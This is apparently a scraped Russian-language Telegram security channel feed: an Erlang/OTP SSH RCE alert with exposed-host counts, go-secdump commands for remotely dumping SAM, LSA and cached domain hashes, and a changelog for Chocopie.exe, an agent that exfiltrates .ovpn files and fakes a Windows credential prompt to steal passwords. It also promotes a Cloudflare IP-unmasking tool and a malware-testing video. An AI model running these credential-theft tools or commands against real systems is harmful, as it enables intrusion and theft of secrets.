Forwarded from Proxy Bar
Critical Erlang/OTP SSH Vulnerability RCE
*
(CVSS 10.0)
Сломали лицо фейспалмом на ровном месте.
*
Читать
*
О чем вообще речь, отбитые ребята из
Потом пришли любители
Ну а дальше любители админ-панелей и кастомных CLI интерфейсов.
Как зарядить простой ERLANG shell ?
НУ вот ssh srv на 1337 порту:
Казалось бы, такую дичь еще нужно умудриться найти, НО !
поиск по шоданам\фофам\хантерам отдает:
Results 27 922
Однако, здравствуйте 0_о
*
(CVSS 10.0)
Сломали лицо фейспалмом на ровном месте.
*
Читать
*
О чем вообще речь, отбитые ребята из
Erlang/OTP, когда то взяли, да и запили свою реализацию SSH (релизы от хакеров из богоПодобной OpenBSD != true)Потом пришли любители
3Dparty из RabbitMQ употребили этот релиз.Ну а дальше любители админ-панелей и кастомных CLI интерфейсов.
Как зарядить простой ERLANG shell ?
НУ вот ssh srv на 1337 порту:
ssh:daemon(1337, [{system_dir, "/etc/ssh"}, {user_dir, "/home/user/.ssh"}]).Казалось бы, такую дичь еще нужно умудриться найти, НО !
поиск по шоданам\фофам\хантерам отдает:
Results 27 922
Однако, здравствуйте 0_о
Forwarded from Whitehat Lab
Инструмент для удалённого извлечения хешей и копирования чувствительных
Добавлено:
Go-secdump can now dump the registry secrets without changing any DACLs thanks to the SeBackupPrivilege
Пример:
./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --sam
./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --lsa
./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --dcc2
Relay:
./go-secdump.exe --host 192.168.0.100 -n --relay
Основные опции:
--host <target>
-P, --port <port>
-d, --domain <domain>
-u, --user <username>
-p, --pass <pass>
-n, --no-pass
--hash <NT Hash>
--local
-k, --kerberos
--dc-ip
--target-ip
--aes-key
--dump
--sam
--lsa
--dcc2
--relay
--relay-port <port>
#soft #golang #redteam #gosecdump
Please open Telegram to view this post
VIEW IN TELEGRAM
Новый ролик на канале 🍿
💬 С вас комментарий для продвижения!
🔗Ссылка:
https://m.youtube.com/watch?v=JTDNAB3qP0M
🔗Ссылка:
https://m.youtube.com/watch?v=JTDNAB3qP0M
YouTube
Я скачал вирусы SheetRat и XWorm на Windows
В этом видео я проведу тестирование двух известных вирусов — SheetRat и XWorm — на операционной системе Windows. Мы разберем, как эти вредоносные программы работают, и покажем, как их можно обнаружить с помощью онлайн лабораторий для анализа вирусов.
Ссылки:…
Ссылки:…
Fsecurity | HH pinned «Новый ролик на канале 🍿 💬 С вас комментарий для продвижения! 🔗Ссылка: https://m.youtube.com/watch?v=JTDNAB3qP0M»
Forwarded from Proxy Bar
Forwarded from Proxy Bar
NASA: Core Flight System - RCE\DOS\Path_Traversal vulns
*
Круто конечно, летишь такой с миссией на МАРС, а тебя разворачивают в сторону ВЕНЕРЫ например, а там не очень с давлением (примерно как чит cv_gravity в counter-strike 1.6 )
*
Read - Hack NASA cFS
*
Круто конечно, летишь такой с миссией на МАРС, а тебя разворачивают в сторону ВЕНЕРЫ например, а там не очень с давлением (примерно как чит cv_gravity в counter-strike 1.6 )
*
Read - Hack NASA cFS
Forwarded from s0ld13r ch. (s0ld13r)
Chocopie.exe 2.0 is came back with new feats 🐸
• Добавлена возможность отслеживать состояние виртуальных интерфейсов CheckPoint VPN через Telegram-бота — удобно для понимания, когда возможен Pivoting и активен ли VPN-интерфейс❗️
• Командой🔍
• Агент полностью переписан на Go - быстрее, прикольнее😏
• Реализован модуль эмуляции окна Windows Credentials UI по аналогии с Adaptix Framework — агент по команде может запросить у пользователя ввод учетных данных через системное окно, и, если они были введены, отправить их в чат😈
🔗 Repo: https://github.com/s0ld13rr/chocopie
ReadMe пока не обновлен, но в ближайшее время появится подробная документация😸
P.S Все возможности Chocopie.exe предназначены исключительно для исследовательской и учебной деятельности. Автор не несет ответственности за неправомерное использование инструмента. Используйте осознанно и в благих целях🚨
🧢 s0ld13r
• Добавлена возможность отслеживать состояние виртуальных интерфейсов CheckPoint VPN через Telegram-бота — удобно для понимания, когда возможен Pivoting и активен ли VPN-интерфейс
• Командой
get_configs можно собрать все найденные .ovpn файлы в один .zip архив и отправить в чат • Агент полностью переписан на Go - быстрее, прикольнее
• Реализован модуль эмуляции окна Windows Credentials UI по аналогии с Adaptix Framework — агент по команде может запросить у пользователя ввод учетных данных через системное окно, и, если они были введены, отправить их в чат
🔗 Repo: https://github.com/s0ld13rr/chocopie
ReadMe пока не обновлен, но в ближайшее время появится подробная документация
P.S Все возможности Chocopie.exe предназначены исключительно для исследовательской и учебной деятельности. Автор не несет ответственности за неправомерное использование инструмента. Используйте осознанно и в благих целях
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Если бы капибары умели программировать, какой язык программирования они бы выбрали?
Anonymous Poll
20%
Python
60%
CapyScript
20%
Java
🥰1
Forwarded from BugXplorer (j b)
CF-Hero is a comprehensive reconnaissance tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.
https://github.com/musana/CF-Hero
🪳 @bugxplorer
https://github.com/musana/CF-Hero
Please open Telegram to view this post
VIEW IN TELEGRAM